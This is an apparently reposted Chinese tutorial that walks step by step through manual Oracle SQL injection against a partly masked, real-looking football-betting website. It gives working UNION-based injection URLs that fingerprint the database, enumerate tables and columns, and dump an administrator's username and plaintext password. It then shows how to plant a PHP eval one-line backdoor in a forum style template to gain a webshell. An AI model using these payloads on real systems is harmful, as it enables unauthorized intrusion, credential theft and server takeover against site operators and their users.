参考案例:手工Oracle注入某足彩在线网站

某足彩在线网站是一个大型的足彩站点,在其中存在着注入点,链接如下:http://www.****china.com/jst/md_end.jsp?id=76,以该注入点为例,讲解如何进行Oracle手工注入攻击检测。

判断注入点

在链接地址后加上单引号,返回信息”java.sql.SQLException: ORA-01756″,可初步判断为Oracle的数据库。

在链接后添加提交”/*”,返回错误页面,说明数据库不是MySQL的。继续在注入点链接后添加”–“,显示正常页面,说明数据库可能为MSSQL和Oracle。再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and (select count (*) from user_tables)>0–

http://www.****china.com/jst/md_end.jsp?id=76 and (select count (*) from dual)>0–

都返回正常页面(图1),确认为Oracle的数据库。

图1  确认Oracle注入#p#

字段数目与字段类型检测

先检测注入点处查询字段数目,提交:

http://www.****china.com/jst/md_end.jsp?id=76 order by 10  //返回错误页面

http://www.****china.com/jst/md_end.jsp?id=76 order by 5  //返回正常页面

http://www.****china.com/jst/md_end.jsp?id=76 order by 8  //返回错误页面

http://www.****china.com/jst/md_end.jsp?id=76 order by 7  //返回正常页面

说明当前表存在7个字段。下面再来检测字段类型,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select 1,2,3,4,5,6,7 from dual

返回错误信息,提示(图2):

expression must have same datatype

图2  数据类型错误#p#

很显然,提交的字段类型不正确,所以查询出错。于是改为提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,null,null,null,null,null from dual

返回正常页面,说明字段数目确实为7个,但是需要确定字段类型。依次提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select ‘null’,null,null,null,null,null,null from dual  //返回正常页面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,’null’,null,null,null,null,null from dual  //返回错误页面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,’null’,null,null,null,null from dual  //返回正常页面

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select null,null,null,’null’,null,null,null from dual  //返回正常页面

……

上面的查询中,用’null’字符串检测该字段处是否为字符型,如果返回正常页面则说明为字符型数据,返回错误页面,则说明该处为数字型。

提交检测完毕后,确认1,3,4,6,7位置处为字符型。提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select ‘1’,2,’3′,’4′,5,’6′,’7′ from dual

返回正常页面(图3),说明字段类型正确。

图3  确认数据类型

检测注入点信息

对注入点进行简单的信息检测,可选择字符型字段处显示要查询的信息,提交如下:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select (select banner from sys.v_$version where rownum=1),2,(select SYS_CONTEXT (‘USERENV’, ‘CURRENT_USER’) from dual), (select member from v$logfile where rownum=1),5,’6′, (select instance_name from v$instance) from dual

从返回页面中得到各种信息(图4):

数据库版本为Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 – 64bi;

前数据库连接用户名为TOTO;

操作系统平台为Linux;

服务器sid为racdb2。

图4  返回注入点各种信息#p#

查询获取表名

先来查询一下当前数据库中的表名,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select ‘1’,2,’3′,(select table_name from user_tables where rownum=1),5,’6′,’7′ from dual

图5

这里选择了字段4处返回信息,得到第1个表名为ACCOUNTS(图5)。

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select ‘1’,2,’3′,(select table_name from user_tables where rownum=1 and table_name<>’ACCOUNTS’),5,’6′,’7′ from dual

注意,表名一定要大写。提交后返回第2个表名为A_USER。再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select ‘1’,2,’3′,(select table_name from user_tables where rownum=1 and table_name<>’ACCOUNTS’ and table_name<>’A_USER’),5,’6′,’7′ from dual

得到第3个表名BOBO_URL_INFO。用同样的方法,可得到其它所有表名,发现其中有一个极为重要的表名USERMG。#p#

查询获取字段名及内容

选择对USERMG表进行查询,提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select ‘1’,2,’3′,(select column_name from user_tab_columns where table_name=’USERMG’ and rownum=1),5,’6′,’7′ from dual

返回USERMG表中第一个字段名USER_NAME,再提交:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select ‘1’,2,’3′,(select column_name from user_tab_columns where table_name=’USERMG’ and column_name<>’USER_NAME’ and rownum=1),5,’6′,’7′ from dual

图6  返回表中字段名

返回第2个字段名USER_PASS(图6)。这两个字段名很明显是用来存储用户名和密码的,直接查询其内容:

http://www.****china.com/jst/md_end.jsp?id=76 and 1=2 union select USERNAME,2,’3′,USER_PASS,5,’6′,’7′ from USERMG

返回页面中,得到了用户名和密码为:admin/toto11admin(图7)。

图7  获得管理员帐号数据#p#

登陆后台上传WebShell

没有直接查找到网站的后台,但是利用管理员帐号,可以从前台进行登录。登录进入后,发现可进入体彩论坛,在论坛中在论坛后台管理页面,直接用此帐号进行登陆,进入论坛管理后台。

在”论坛管理”→”界面风格”→”默认风格”→”详情”中,点击”新增变量”,将变量内容设置为:

‘, ‘#999’);eval($_POST[c]);

图8  添加变量写入一句话木马

替换内容可随便填(图8)。点击”提交”按钮后,一句话木马就被写入模板风格文件中了。用一句话木马连接论坛风格页面文件:

http://bbs.****china.com/forumdata/cache/style_1.php

图9  连接一句话木马

密码为c,粘贴入要上传的WebShell代码内容,即可连接一句话木马获得WebShell(图9)。WebShell的权限比较大,可轻易的控制远程网站服务器。

【编辑推荐】

  1. Oracle注入点信息基本检测
  2. Oracle listener程序所存在安全漏洞有哪些?
  3. OpenWorld案例分享:Oracle透明数据加密技术
  4. Oracle数据库内部安全威胁:审计特权用户

文章来源网络,作者:管理,如若转载,请注明出处:https://shuyeidc.com/wp/137300.html<

(0)
管理的头像管理
上一篇2025-03-02 12:01
下一篇 2025-03-02 12:02

相关推荐

  • 云服务器和云虚拟主机怎么选?云服务器和虚拟主机区别

    云服务器适合业务增长快、需弹性扩展的场景,而云虚拟主机适合预算有限、技术门槛低的小型静态网站或测试环境,二者核心区别在于资源独享性与运维复杂度,核心差异解析:从底层架构到使用体验很多人容易混淆这两者,觉得它们都是“买空间建站”,它们的底层逻辑完全不同,云服务器(ECS)就像是你租了一整栋别墅,水电网络独立,你想……

    2026-06-29
    0
  • 赣州智慧旅游招聘是真的吗?赣州旅游人才招聘信息

    中级岗位(3-5年经验)月薪范围通常在6000-10000元,这类岗位需要独立负责项目模块,如独立运营一个抖音账号,或维护一个景区小程序的功能迭代,具备成功案例的候选人议价能力较强,高级岗位(5年以上经验)月薪范围通常在10000-20000元,部分核心管理岗可达更高,这类人才需要具备战略规划能力,如制定整个景……

    2026-06-29
    0
  • 赣州智能物联网车位锁如何管理?智能车位锁管理系统多少钱

    赣州智能物联网车位锁管理的核心在于通过云端平台实现远程控锁、状态实时监控及自动计费,彻底解决传统车位“被占难管”与“找位难”的痛点,在赣州这样的城市,随着机动车保有量的持续增长,老旧小区、商业综合体以及私人固定车位的资源矛盾日益凸显,传统的机械地锁或简易遥控锁,不仅操作繁琐,更无法实现数据化管理,引入智能物联网……

    2026-06-29
    0
  • 赣州智能消防栓好用吗,智能消防栓多少钱一个

    赣州智能消防栓通过物联网技术实现实时监测与远程报警,能显著降低火灾响应时间并提升城市消防安全管理水平,是目前智慧城市建设中不可或缺的基础设施,赣州智能消防栓的核心价值与应用场景传统消防栓往往存在“看不见、摸不着、用不了”的痛点,在赣州这样地形复杂、老城区与新城区并存的区域,传统设施的管理难度极大,智能消防栓的出……

    2026-06-29
    0
  • 云服务器和物理机到底有啥区别?

    云服务器本质上是虚拟化资源池中的弹性实例,而传统物理服务器是独占的硬件实体,前者胜在弹性与运维便捷,后者强在物理隔离与性能稳定,具体选择取决于业务对成本、扩展性及安全合规的权衡,很多人初次接触服务器时,容易把“云服务器”和“传统物理服务器”混为一谈,觉得它们都是用来跑网站或存数据的盒子,这两者的底层逻辑完全不同……

    2026-06-29
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注